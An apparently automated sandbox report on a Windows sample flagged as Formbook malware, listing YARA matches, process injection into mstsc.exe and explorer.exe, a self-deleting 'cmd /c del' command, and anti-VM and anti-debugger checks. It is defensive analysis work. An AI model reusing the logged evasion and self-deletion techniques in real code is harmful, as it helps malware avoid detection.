          Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@15/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_01
          Source: ASQ2109942.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ASQ2109942.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: ASQ2109942.exeReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\ASQ2109942.exeFile read: C:\Users\user\Desktop\ASQ2109942.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\ASQ2109942.exe 'C:\Users\user\Desktop\ASQ2109942.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\ASQ2109942.exe C:\Users\user\Desktop\ASQ2109942.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ASQ2109942.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\ASQ2109942.exeProcess created: C:\Users\user\Desktop\ASQ2109942.exe C:\Users\user\Desktop\ASQ2109942.exeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ASQ2109942.exe'Jump to behavior
          Source: ASQ2109942.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: ASQ2109942.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: ASQ2109942.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: ASQ2109942.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: ASQ2109942.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: ASQ2109942.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: ASQ2109942.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: ASQ2109942.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.937173575.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: ASQ2109942.exe, 00000000.00000003.687298130.0000000002590000.00000004.00000001.sdmp, ASQ2109942.exe, 00000005.00000002.734881448.0000000000CA0000.00000040.00000001.sdmp, mstsc.exe, 0000000C.00000002.927081087.0000000005340000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ASQ2109942.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: ASQ2109942.exe, 00000005.00000002.738243526.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: ASQ2109942.exe, 00000005.00000002.738243526.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000002.937173575.0000000005A00000.00000002.00000001.sdmp
          Source: ASQ2109942.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: ASQ2109942.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: ASQ2109942.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: ASQ2109942.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: ASQ2109942.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: ASQ2109942.exeStatic PE information: real checksum: 0x39d6b should be: 0x6686a
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_00901016 push ecx; ret 0_2_00901029
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00901016 push ecx; ret 5_2_00901029
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D1D0D1 push ecx; ret 5_2_00D1D0E4
          Source: C:\Windows\explorer.exeCode function: 7_2_04E076ED push es; retf 7_2_04E076EF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_053BD0D1 push ecx; ret 12_2_053BD0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107591D pushfd ; retf 12_2_0107592E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107C9C9 push ecx; ret 12_2_0107C9CD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107AD55 push eax; ret 12_2_0107ADA8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107ADA2 push eax; ret 12_2_0107ADA8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107ADAB push eax; ret 12_2_0107AE12
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_010747FA push esi; ret 12_2_01074801
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 12_2_0107AE0C push eax; ret 12_2_0107AE12
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\ASQ2109942.exeRDTSC instruction interceptor: First address: 00000000006083C4 second address: 00000000006083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ASQ2109942.exeRDTSC instruction interceptor: First address: 000000000060875E second address: 0000000000608764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000010683C4 second address: 00000000010683CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 000000000106875E second address: 0000000001068764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CF6A60 rdtscp 5_2_00CF6A60
          Source: C:\Windows\explorer.exe TID: 6828Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 6456Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_0090F97B FindFirstFileExW,0_2_0090F97B
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_0090F97B FindFirstFileExW,5_2_0090F97B
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.713852272.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.937672903.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.713852272.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.705712775.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000007.00000000.714013568.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.714080044.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000007.00000002.936900832.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\ASQ2109942.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\ASQ2109942.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00CF6A60 rdtscp 5_2_00CF6A60
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00D098F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00D098F0
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_00900DB7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00900DB7
          <
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_00900340 mov eax, dword ptr fs:[00000030h]0_2_00900340
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_009084CA mov eax, dword ptr fs:[00000030h]0_2_009084CA
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_0090E60F mov eax, dword ptr fs:[00000030h]0_2_0090E60F
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_001FEB2F mov eax, dword ptr fs:[00000030h]0_2_001FEB2F
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_001FF49B mov eax, dword ptr fs:[00000030h]0_2_001FF49B
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_001FF4D6 mov eax, dword ptr fs:[00000030h]0_2_001FF4D6
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 0_2_001FF539 mov eax, dword ptr fs:[00000030h]0_2_001FF539
          Source: C:\Users\user\Desktop\ASQ2109942.exeCode function: 5_2_00900340 mov eax, dword ptr fs:[00000030h]